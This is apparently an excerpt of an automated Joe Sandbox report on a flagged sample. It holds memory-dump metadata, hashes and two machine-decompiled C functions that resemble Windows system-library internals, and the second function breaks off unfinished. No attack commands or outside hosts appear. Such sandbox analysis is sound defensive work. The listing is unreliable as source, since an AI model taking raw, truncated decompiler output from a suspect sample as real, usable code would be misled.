                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                            • Instruction ID: 7816a99d739052c2e8c1207e840f0c8fc64439c243126d83e6de27575d036e71
                                                                            • Opcode Fuzzy Hash: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                            • Instruction Fuzzy Hash: 6DF1F872E006259FCB08CF68C99167EFBF5EF88210B1A456EE496DB790D634EE41CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                            			E1D7FEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				intOrPtr _t196;
                                                                            				signed int _t201;
                                                                            				signed int _t202;
                                                                            				intOrPtr _t206;
                                                                            				signed int _t207;
                                                                            				intOrPtr _t209;
                                                                            				intOrPtr _t215;
                                                                            				signed int _t222;
                                                                            				signed int _t227;
                                                                            				signed int _t228;
                                                                            				signed int _t231;
                                                                            				signed int _t244;
                                                                            				signed int _t247;
                                                                            				char* _t250;
                                                                            				intOrPtr _t255;
                                                                            				signed int _t269;
                                                                            				signed int* _t270;
                                                                            				intOrPtr _t279;
                                                                            				signed char _t284;
                                                                            				signed int _t291;
                                                                            				signed int _t292;
                                                                            				intOrPtr _t301;
                                                                            				intOrPtr* _t307;
                                                                            				signed int _t308;
                                                                            				signed int _t309;
                                                                            				intOrPtr _t313;
                                                                            				intOrPtr _t314;
                                                                            				intOrPtr* _t316;
                                                                            				void* _t318;
                                                                            
                                                                            				_push(0x7c);
                                                                            				_push(0x1d8ac610);
                                                                            				E1D827C40(__ebx, __edi, __esi);
                                                                            				_t313 = __edx;
                                                                            				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
                                                                            				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
                                                                            				 *(_t318 - 0x58) = 0;
                                                                            				 *((intOrPtr*)(_t318 - 0x74)) = 0;
                                                                            				_t269 = 0;
                                                                            				 *(_t318 - 0x64) = 0;
                                                                            				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
                                                                            				_t196 = __edx + 0x28;
                                                                            				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
                                                                            				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
                                                                            				L1D7E2330(_t196, _t196);
                                                                            				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                            				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                            				L1:
                                                                            				while(1) {
                                                                            					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
                                                                            						E1D7E24D0( *((intOrPtr*)(_t318 - 0x78)));
                                                                            						asm("sbb ebx, ebx");
                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
                                                                            						return  ~_t269 & 0xc000022d;
                                                                            					}
                                                                            					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
                                                                            					_t307 = 0x7ffe0010;
                                                                            					_t270 = 0x7ffe03b0;
                                                                            					goto L4;
                                                                            					do {
                                                                            						do {
                                                                            							do {
                                                                            								do {
                                                                            									L4:
                                                                            									_t201 =  *0x1d8c67f0; // 0x0
                                                                            									 *(_t318 - 0x30) = _t201;
                                                                            									_t202 =  *0x1d8c67f4; // 0x0
                                                                            									 *(_t318 - 0x3c) = _t202;
                                                                            									 *(_t318 - 0x28) =  *_t270;
                                                                            									 *(_t318 - 0x5c) = _t270[1];
                                                                            									while(1) {
                                                                            										_t301 =  *0x7ffe000c;
                                                                            										_t279 =  *0x7ffe0008;
                                                                            										__eflags = _t301 -  *_t307;
                                                                            										if(_t301 ==  *_t307) {
                                                                            											goto L6;
                                                                            										}
                                                                            										asm("pause");
                                                                            									}
                                                                            									L6:
                                                                            									_t270 = 0x7ffe03b0;
                                                                            									_t308 =  *0x7ffe03b0;
                                                                            									 *(_t318 - 0x38) = _t308;
                                                                            									_t206 =  *0x7FFE03B4;
                                                                            									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
                                                                            									__eflags =  *(_t318 - 0x28) - _t308;
                                                                            									_t307 = 0x7ffe0010;
                                                                            								} while ( *(_t318 - 0x28) != _t308);
                                                                            								__eflags =  *(_t318 - 0x5c) - _t206;
                                                                            							} while ( *(_t318 - 0x5c) != _t206);
                                                                            							_t207 =  *0x1d8c67f0; // 0x0
                                                                            							_t309 =  *0x1d8c67f4; // 0x0
                                                                            							 *(_t318 - 0x28) = _t309;
                                                                            							__eflags =  *(_t318 - 0x30) - _t207;
                                                                            							_t307 = 0x7ffe0010;
                                                                            						} while ( *(_t318 - 0x30) != _t207);
                                                                            						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
                                                                            					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
                                                                            					_t316 =  *((intOrPtr*)(_t318 - 0x68));
                                                                            					_t269 =  *(_t318 - 0x64);
                                                                            					asm("sbb edx, [ebp-0x34]");
                                                                            					asm("sbb edx, eax");
                                                                            					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
                                                                            					asm("adc edx, edi");
                                                                            					asm("lock inc dword [esi+0x28]");
                                                                            					_t209 =  *((intOrPtr*)(_t318 - 0x20));
                                                                            					_t40 = _t209 + 0x18; // 0x193d4b8
                                                                            					_t284 =  *(_t316 + 0x20) &  *_t40;
                                                                            					 *(_t318 - 0x38) = _t284;
                                                                            					__eflags =  *(_t316 + 0x30);
                                                                            					if( *(_t316 + 0x30) != 0) {
                                                                            						L37:
                                                                            						_t314 =  *_t316;
                                                                            						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                            						E1D7FF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
                                                                            						__eflags =  *(_t318 - 0x58);
                                                                            						if( *(_t318 - 0x58) != 0) {
                                                                            							 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x74)));
                                                                            							 *(_t318 - 0x58)();
                                                                            						}
                                                                            						continue;
                                                                            					}
                                                                            					__eflags = _t284;
                                                                            					if(_t284 == 0) {
                                                                            						goto L37;
                                                                            					}
                                                                            					 *(_t318 - 0x60) = _t284;
                                                                            					_t44 = _t318 - 0x60;
                                                                            					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
                                                                            					__eflags =  *_t44;
                                                                            					if( *_t44 == 0) {
                                                                            						L40:
                                                                            						__eflags = _t284 & 0xfffffffe;
                                                                            						if((_t284 & 0xfffffffe) != 0) {
                                                                            							__eflags =  *(_t316 + 0x60);
                                                                            							if( *(_t316 + 0x60) == 0) {
                                                                            								L14:
                                                                            								__eflags =  *(_t316 + 0x3c);
                                                                            								if( *(_t316 + 0x3c) != 0) {
                                                                            									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
                                                                            									if(__eflags > 0) {
                                                                            										goto L15;
                                                                            									}
                                                                            									if(__eflags < 0) {
                                                                            										L59:
                                                                            										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
                                                                            										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
                                                                            										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
                                                                            											goto L37;
                                                                            										}
                                                                            										goto L15;
                                                                            									}
                                                                            									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
                                                                            									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
                                                                            										goto L15;
                                                                            									}
                                                                            									goto L59;
                                                                            								}
                                                                            								L15:
                                                                            								__eflags =  *(_t318 + 8);
                                                                            								if( *(_t318 + 8) != 0) {
                                                                            									__eflags =  *(_t316 + 0x54);
                                                                            									if( *(_t316 + 0x54) != 0) {
                                                                            										goto L16;
                                                                            									}
                                                                            									goto L37;
                                                                            								}
                                                                            								L16:
                                                                            								 *(_t318 - 0x24) = 0;
                                                                            								 *(_t318 - 0x30) = 0;
                                                                            								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
                                                                            								_t215 =  *((intOrPtr*)(_t316 + 8));
                                                                            								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
                                                                            								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
                                                                            								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
                                                                            								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
                                                                            								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
                                                                            								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                            								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
                                                                            								 *(_t318 - 0x8c) = _t222;
                                                                            								_t291 = _t222;
                                                                            								 *(_t318 - 0x28) = _t291;
                                                                            								 *(_t318 - 0x88) = _t291;
                                                                            								E1D7E24D0(_t222);
                                                                            								_t292 = 0;
                                                                            								 *(_t318 - 0x50) = 0;
                                                                            								 *(_t318 - 0x4c) = 0;
                                                                            								 *(_t318 - 0x3c) = 0;
                                                                            								__eflags =  *(_t316 + 0x24);
                                                                            								if(__eflags != 0) {
                                                                            									asm("lock bts dword [eax], 0x0");
                                                                            									_t227 = 0;
                                                                            									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
                                                                            									 *(_t318 - 0x4c) = _t228;
                                                                            									 *(_t318 - 0x3c) = _t228;
                                                                            									__eflags = _t228;
                                                                            									if(_t228 != 0) {
                                                                            										goto L17;
                                                                            									}
                                                                            									__eflags =  *(_t318 + 8) - 1;
                                                                            									if( *(_t318 + 8) == 1) {
                                                                            										L1D7E2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
                                                                            										_t228 = 1;
                                                                            										 *(_t318 - 0x4c) = 1;
                                                                            										 *(_t318 - 0x3c) = 1;
                                                                            										goto L17;
                                                                            									}
                                                                            									_t231 = _t228 + 1;
                                                                            									L35:
                                                                            									 *(_t316 + 0x54) = _t231;
                                                                            									__eflags = _t292;
                                                                            									if(_t292 == 0) {
                                                                            										L1D7E2330(_t231,  *(_t318 - 0x28));
                                                                            									}
                                                                            									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
                                                                            									goto L37;
                                                                            								}
                                                                            								L17:
                                                                            								__eflags =  *(_t316 + 0x30);
                                                                            								if( *(_t316 + 0x30) != 0) {
                                                                            									L26:
                                                                            									__eflags =  *(_t318 - 0x4c);
                                                                            									if( *(_t318 - 0x4c) != 0) {
                                                                            										_t228 = E1D7E24D0( *(_t316 + 0x24) + 0x10);
                                                                            									}
                                                                            									__eflags =  *(_t318 - 0x30);
                                                                            									if( *(_t318 - 0x30) == 0) {
                                                                            										L71:
                                                                            										_t292 =  *(_t318 - 0x50);
                                                                            										L34:
                                                                            										_t231 = 0;
                                                                            										goto L35;
                                                                            									}
                                                                            									L1D7E2330(_t228,  *(_t318 - 0x8c));
                                                                            									_t292 = 1;
                                                                            									 *(_t318 - 0x50) = 1;
                                                                            									__eflags =  *(_t318 - 0x24) - 0xc000022d;
                                                                            									if( *(_t318 - 0x24) == 0xc000022d) {
                                                                            										L69:
                                                                            										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                            										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
                                                                            											goto L34;
                                                                            										}
                                                                            										_t269 = 1;
                                                                            										__eflags = 1;
                                                                            										 *(_t318 - 0x64) = 1;
                                                                            										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
                                                                            										E1D85C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
                                                                            										goto L71;
                                                                            									}
                                                                            									__eflags =  *(_t318 - 0x24) - 0xc0000017;
                                                                            									if( *(_t318 - 0x24) == 0xc0000017) {
                                                                            										goto L69;
                                                                            									}
                                                                            									__eflags =  *(_t316 + 0x18);
                                                                            									if( *(_t316 + 0x18) != 0) {
                                                                            										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
                                                                            										__eflags =  *_t133 -  *(_t316 + 0x18);
                                                                            										if( *_t133 -  *(_t316 + 0x18) > 0) {
                                                                            											goto L31;
                                                                            										}
                                                                            										L32:
                                                                            										__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                            										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                            											__eflags =  *(_t316 + 0x4c);
                                                                            											if( *(_t316 + 0x4c) > 0) {
                                                                            												 *(_t316 + 0x3c) = 0;
                                                                            												 *((intOrPtr*)(_t316 + 0x50)) = 0;
                                                                            												 *((intOrPtr*)(_t316 + 0x44)) = 0;
                                                                            												 *((intOrPtr*)(_t316 + 0x48)) = 0;
                                                                            												 *(_t316 + 0x4c) = 0;
                                                                            												 *((intOrPtr*)(_t316 + 0x58)) = 0;
                                                                            											}
                                                                            										}
                                                                            										goto L34;
                                                                            									}
                                                                            									L31:
                                                                            									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
                                                                            									 *(_t316 + 0x18) =  *_t107;
                                                                            									goto L32;
                                                                            								}
                                                                            								 *(_t318 - 0x30) = 1;
                                                                            								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
                                                                            								 *((intOrPtr*)(_t318 - 0x6c)) = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                            								 *((intOrPtr*)(_t318 - 4)) = 0;
                                                                            								__eflags =  *(_t318 - 0x60);
                                                                            								if( *(_t318 - 0x60) != 0) {
                                                                            									_t255 =  *((intOrPtr*)(_t318 - 0x20));
                                                                            									_t82 = _t255 + 0x14; // 0x193d4b8
                                                                            									_t86 = _t255 + 0x10; // 0x1940b04
                                                                            									 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
                                                                            									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
                                                                            								}
                                                                            								_t244 =  *(_t318 - 0x38);
                                                                            								__eflags = _t244 & 0x00000010;
                                                                            								if((_t244 & 0x00000010) != 0) {
                                                                            									__eflags =  *(_t316 + 0x30);
                                                                            									if( *(_t316 + 0x30) != 0) {
                                                                            										goto L21;
                                                                            									}
                                                                            									__eflags =  *(_t318 - 0x24);
                                                                            									if( *(_t318 - 0x24) >= 0) {
                                                                            										L64:
                                                                            										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
                                                                            										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                            										 *(_t318 - 0x24) = 0;
                                                                            										_t244 =  *(_t318 - 0x38);
                                                                            										goto L21;
                                                                            									}
                                                                            									__eflags =  *(_t316 + 0x1c) & 0x00000004;
                                                                            									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
                                                                            										goto L21;
                                                                            									}
                                                                            									goto L64;
                                                                            								} else {
                                                                            									L21:
                                                                            									__eflags = _t244 & 0xffffffee;
                                                                            									if((_t244 & 0xffffffee) != 0) {
                                                                            										 *(_t318 - 0x24) = 0;
                                                                            										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
                                                                            										 *((intOrPtr*)(_t318 - 0x2c))();
                                                                            									}
                                                                            									_t247 = E1D7E3C40();
                                                                            									__eflags = _t247;
                                                                            									if(_t247 != 0) {
                                                                            										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
                                                                            									} else {
                                                                            										_t250 = 0x7ffe038e;
                                                                            									}
                                                                            									__eflags =  *_t250;
                                                                            									if( *_t250 != 0) {
                                                                            										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
                                                                            										_t250 = E1D85C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
                                                                            									}
                                                                            									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
                                                                            									E1D7FF1DB(_t250);
                                                                            									_t228 = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
                                                                            									goto L26;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						__eflags = _t284 & 0x00000010;
                                                                            						if((_t284 & 0x00000010) == 0) {
                                                                            							goto L37;
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            					__eflags =  *(_t316 + 0x18);
                                                                            					if( *(_t316 + 0x18) != 0) {
                                                                            						_t120 = _t209 + 0x10; // 0x1940b04
                                                                            						__eflags =  *_t120 -  *(_t316 + 0x18);
                                                                            						if( *_t120 -  *(_t316 + 0x18) > 0) {
                                                                            							goto L14;
                                                                            						}
                                                                            						goto L40;
                                                                            					}
                                                                            					goto L14;
                                                                            				}
                                                                            			}

































                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                            • Instruction ID: 6bd0b1ab5b216539c5f37880db88014d65ef223186672577e4548d6b17ed1c33
                                                                            • Opcode Fuzzy Hash: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                            • Instruction Fuzzy Hash: F1E1D075D00648DFCB25CFA9D984A9DFBF1BF48720F10492AE569A7360DB70A844CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E1D7D58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                            				void* _v8;
                                                                            				signed int _v12;
                                                                            				char _v20;
                                                                            				intOrPtr _v28;
                                                                            				signed int _v32;
                                                                            				char _v44;
                                                                            				signed int _v48;
                                                                            				signed int _v52;
                                                                            				char _v56;
                                                                            				signed int _v60;
                                                                            				signed int _v64;
                                                                            				intOrPtr _v68;
                                                                            				intOrPtr _v72;
                                                                            				intOrPtr _v76;
                                                                            				intOrPtr _v80;
                                                                            				signed int _v84;
                                                                            				char _v96;
                                                                            				intOrPtr _v144;
                                                                            				signed int _v160;
                                                                            				signed int _v164;
                                                                            				intOrPtr _v168;
                                                                            				signed char _v176;
                                                                            				intOrPtr _v180;
                                                                            				char _v216;
                                                                            				intOrPtr _v220;
                                                                            				signed int _v228;
                                                                            				intOrPtr* _v240;
                                                                            				char _v244;
                                                                            				char _v245;
                                                                            				char _v246;
                                                                            				char _v247;
                                                                            				char _v248;
                                                                            				char _v249;
                                                                            				char _v250;
                                                                            				char _v251;
                                                                            				char _v252;
                                                                            				char _v253;
                                                                            				signed int _v260;
                                                                            				char _v261;
                                                                            				signed int _v268;
                                                                            				signed int _v272;
                                                                            				signed int _v276;
                                                                            				signed int _v280;
                                                                            				signed int _v288;
                                                                            				signed int _v292;
                                                                            				char _v300;
                                                                            				void* _v304;
                                                                            				signed int _v308;
                                                                            				char _v312;
                                                                            				signed int _v316;
                                                                            				signed int _v320;
                                                                            				signed int _v324;
                                                                            				signed int _v328;
                                                                            				char _v352;
                                                                            				signed int* _v356;
                                                                            				signed int _v360;
                                                                            				signed int _v364;
                                                                            				signed int _v380;
                                                                            				intOrPtr _v388;
                                                                            				signed int _v392;
                                                                            				intOrPtr _v396;
                                                                            				signed int _v400;
                                                                            				signed int _v404;
                                                                            				signed int _v408;
                                                                            				signed int _t235;
                                                                            				signed int _t236;
                                                                            				intOrPtr* _t242;
                                                                            				intOrPtr _t250;
                                                                            				char _t253;
                                                                            				char _t254;
                                                                            				intOrPtr _t257;
                                                                            				signed int _t261;
                                                                            				intOrPtr _t262;
                                                                            				char _t268;
                                                                            				void* _t273;
                                                                            				signed int* _t282;
                                                                            				intOrPtr _t288;
                                                                            				signed int* _t292;
                                                                            				signed int _t293;
                                                                            				signed int _t297;
                                                                            				char _t298;
                                                                            				intOrPtr _t309;
                                                                            				signed int _t316;
                                                                            				char _t317;
                                                                            				signed int _t322;
                                                                            				signed int _t323;
                                                                            				char _t332;
                                                                            				intOrPtr _t339;
                                                                            				intOrPtr _t340;
                                                                            				intOrPtr* _t342;
                                                                            				signed int _t343;
                                                                            				signed int _t356;
                                                                            				signed int _t359;
                                                                            				signed int _t360;
                                                                            				signed int _t361;
                                                                            				signed int _t366;
                                                                            				intOrPtr* _t368;
                                                                            				char* _t375;
                                                                            				signed int _t377;
                                                                            				signed int _t380;
                                                                            				intOrPtr* _t384;
                                                                            				signed int _t387;
                                                                            				intOrPtr _t388;
                                                                            				void* _t389;
                                                                            				void* _t390;
                                                                            
                                                                            				_t390 = __eflags;
                                                                            				_t379 = __esi;
                                                                            				_t341 = __ebx;
                                                                            				_push(0xfffffffe);
                                                                            				_push(0x1d8abd28);
                                                                            				_push(0x1d81ad20);
                                                                            				_push( *[fs:0x0]);
                                                                            				_t388 = _t387 - 0x184;
                                                                            				_t235 =  *0x1d8cb370;
                                                                            				_v12 = _v12 ^ _t235;
                                                                            				_t236 = _t235 ^ _t387;
                                                                            				_v32 = _t236;
                                                                            				_push(__ebx);
                                                                            				_push(__esi);
                                                                            				_push(__edi);
                                                                            				_push(_t236);
                                                                            				 *[fs:0x0] =  &_v20;
                                                                            				_v28 = _t388;
                                                                            				_t377 = _a4;
                                                                            				_v312 = 0;
                                                                            				_v260 = _t377;
                                                                            				_v250 = 0;
                                                                            				_v251 = 0;
                                                                            				_v247 = 0;
                                                                            				_v246 = 0;
                                                                            				_v252 = 0;
                                                                            				_v245 = 0;
                                                                            				_v248 = 0;
                                                                            				_v253 = 0;
                                                                            				_v304 = 0;
                                                                            				_v268 = 0;
                                                                            				E1D7D8120();
                                                                            				_v292 =  *[fs:0x30];
                                                                            				_v8 = 0;
                                                                            				E1D7D80BE(__ebx,  &_v312, _t377, __esi, _t390);
                                                                            				_t347 =  &_v304;
                                                                            				E1D7D8009( &_v304);
                                                                            				_t242 = _v304;
                                                                            				if(_t242 != 0) {
                                                                            					_t347 =  &_v244;
                                                                            					 *_t242 =  &_v244;
                                                                            				}
                                                                            				E1D818F40( &_v244, 0, 0xd4);
                                                                            				_t389 = _t388 + 0xc;
                                                                            				_v8 = 1;
                                                                            				_v8 = 2;
                                                                            				L1D7D53C0(_t377 + 0xe0);
                                                                            				_v8 = 3;
                                                                            				if( *((char*)(_t377 + 0xe5)) != 0) {
                                                                            					_v276 = 0xc000010a;
                                                                            					L73:
                                                                            					_v246 = 1;
                                                                            					_v247 = 1;
                                                                            					L5:
                                                                            					_v8 = 2;
                                                                            					E1D7D6055(_t377);
                                                                            					_t394 = _v247;
                                                                            					if(_v247 != 0) {
                                                                            						L67:
                                                                            						_v8 = 1;
                                                                            						E1D7D6074(_t341, _t347, _t377, _t379);
                                                                            						_v8 = 0;
                                                                            						E1D7D6179(_t379);
                                                                            						_t379 = 0;
                                                                            						__eflags = 0;
                                                                            						_v276 = 0;
                                                                            						_v8 = 0xfffffffe;
                                                                            						_t250 = E1D80B490(_t347, _t371, 0);
                                                                            						L68:
                                                                            						_v300 = 0;
                                                                            						L12:
                                                                            						if((_v84 & 0x00000001) != 0) {
                                                                            							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
                                                                            							_v84 = _v84 & 0xfffffffe;
                                                                            							_t250 = _v276;
                                                                            						}
                                                                            						if(_t250 != 0) {
                                                                            							_t253 = _t250 - 0x80;
                                                                            							__eflags = _t253;
                                                                            							if(_t253 == 0) {
                                                                            								goto L67;
                                                                            							}
                                                                            							_t254 = _t253 - 0x40;
                                                                            							__eflags = _t254;
                                                                            							if(_t254 == 0) {
                                                                            								_v8 = 6;
                                                                            								_t347 = 0;
                                                                            								E1D7D63CB(0);
                                                                            								_v8 = 2;
                                                                            								goto L8;
                                                                            							}
                                                                            							__eflags = _t254 != 0x42;
                                                                            							if(_t254 != 0x42) {
                                                                            								goto L8;
                                                                            							}
                                                                            							_v253 = 1;
                                                                            							goto L67;
                                                                            						} else {
                                                                            							if(_t377 != 0) {
                                                                            								_t268 =  *((intOrPtr*)(_t377 + 0x110));
                                                                            								__eflags = _t268;
                                                                            								if(_t268 != 0) {
                                                                            									L16:
                                                                            									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
                                                                            										_t379 = _t377 + 0x2c;
                                                                            										L1D7E2330(_t268, _t377 + 0x2c);
                                                                            										E1D8A4407(_t377);
                                                                            										E1D7E24D0(_t377 + 0x2c);
                                                                            									}
                                                                            									_t371 = _v288;
                                                                            									_t347 =  &_v244;
                                                                            									_t273 = E1D7D64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
                                                                            									if(_t273 != 0) {
                                                                            										goto L67;
                                                                            									} else {
                                                                            										if(_v245 != _t273) {
                                                                            											L8:
                                                                            											_v268 = 0;
                                                                            											_v64 = 0;
                                                                            											_v60 = 0;
                                                                            											_v56 = 0;
                                                                            											_v52 = 0;
                                                                            											_t341 = _v48;
                                                                            											_v280 = 0x10;
                                                                            											if(_t341 == 0) {
                                                                            												_t257 =  *0x1d8c6644; // 0x0
                                                                            												_v392 = _t257 + 0x300000;
                                                                            												_t261 = E1D7E5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
                                                                            												__eflags = _t261;
                                                                            												if(_t261 == 0) {
                                                                            													L75:
                                                                            													_v280 = 1;
                                                                            													_t261 =  &_v64;
                                                                            													L11:
                                                                            													_v288 = _t261;
                                                                            													_v300 = 0;
                                                                            													_v8 = 5;
                                                                            													_t262 =  *((intOrPtr*)(_t377 + 0x24));
                                                                            													_v396 = _t262;
                                                                            													_push( &_v96);
                                                                            													_t347 =  &_v300;
                                                                            													_push( &_v300);
                                                                            													_push(_v280);
                                                                            													_push(_v288);
                                                                            													_push(_t262);
                                                                            													_t250 = E1D8146E0();
                                                                            													_v276 = _t250;
                                                                            													_v8 = 2;
                                                                            													if(_t250 != 0) {
                                                                            														goto L68;
                                                                            													}
                                                                            													goto L12;
                                                                            												}
                                                                            												_t181 = _t261 + 0x1c0; // 0x1c0
                                                                            												_t366 = _t181;
                                                                            												 *_t366 = _t261;
                                                                            												 *((intOrPtr*)(_t366 + 4)) = 1;
                                                                            												 *((intOrPtr*)(_t366 + 8)) = 0x10;
                                                                            												_v48 = _t366;
                                                                            												_v280 = 0x10;
                                                                            												goto L11;
                                                                            											}
                                                                            											if( *((intOrPtr*)(_t341 + 4)) != 1) {
                                                                            												goto L75;
                                                                            											}
                                                                            											_t379 = _v48;
                                                                            											E1D818F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
                                                                            											_t389 = _t389 + 0xc;
                                                                            											_v280 =  *(_t379 + 8);
                                                                            											_t261 =  *_t341;
                                                                            											goto L11;
                                                                            										}
                                                                            										_t379 = _v64;
                                                                            										if(_t379 != 0) {
                                                                            											_v400 = _t379;
                                                                            											_v168 =  *((intOrPtr*)(_t379 + 0x20));
                                                                            											_v164 = _t379;
                                                                            											_t372 =  &_v244;
                                                                            											E1D7D6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
                                                                            											E1D7D6D60( &_v216);
                                                                            											_v8 = 7;
                                                                            											_t342 =  *((intOrPtr*)(_t379 + 0x20));
                                                                            											_push( &_v56);
                                                                            											_push(_v60);
                                                                            											_push(_t379);
                                                                            											_push( &_v216);
                                                                            											__eflags = _t342 - E1D7D6E00;
                                                                            											if(_t342 == E1D7D6E00) {
                                                                            												E1D7D6E00( &_v216);
                                                                            												L33:
                                                                            												_v8 = 2;
                                                                            												L34:
                                                                            												if((_v176 & 0x00000004) != 0) {
                                                                            													_v248 = 1;
                                                                            												}
                                                                            												_v261 = _v180 == 4;
                                                                            												_v8 = 9;
                                                                            												E1D7D61C3( &_v216, _t372);
                                                                            												_v8 = 2;
